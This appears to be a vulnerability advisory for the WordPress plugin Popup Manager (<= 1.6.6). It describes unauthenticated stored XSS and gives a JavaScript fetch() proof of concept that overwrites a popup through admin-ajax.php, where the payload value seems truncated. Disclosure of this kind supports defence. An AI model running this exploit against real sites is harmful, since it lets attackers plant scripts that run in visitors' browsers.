Popup Manager <= 1.6.6 - Unauthenticated Stored XSS

The plugin does not have authorisation and CSRF check when creating/updating popups, and is missing sanitisation as well as escaping, which could allow unauthenticated attackers to create arbitrary popups and add Stored XSS payloads as well

PoC

fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=pm_save_data&form;_action=update&form;_id=1&form;_name=vulnerability&form;_data={“form_action”:“undefined”,“popup_template”:“text”,“popup_template_style”:“”,“popup_location”:“modal-popup”,“popup_timer”:“0”,“popup_trigger”:“timer”,“popup_entry_animation”:“bounce”,“popup_exit_animation”:“bounce”,“popup_title”:“XSS”,“popup_disclaimer”:“Try XSS”,“popup_text”:“vulnerable”}&popup;_html=’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); This exploit script replaces the html of popup #1 with a script tag.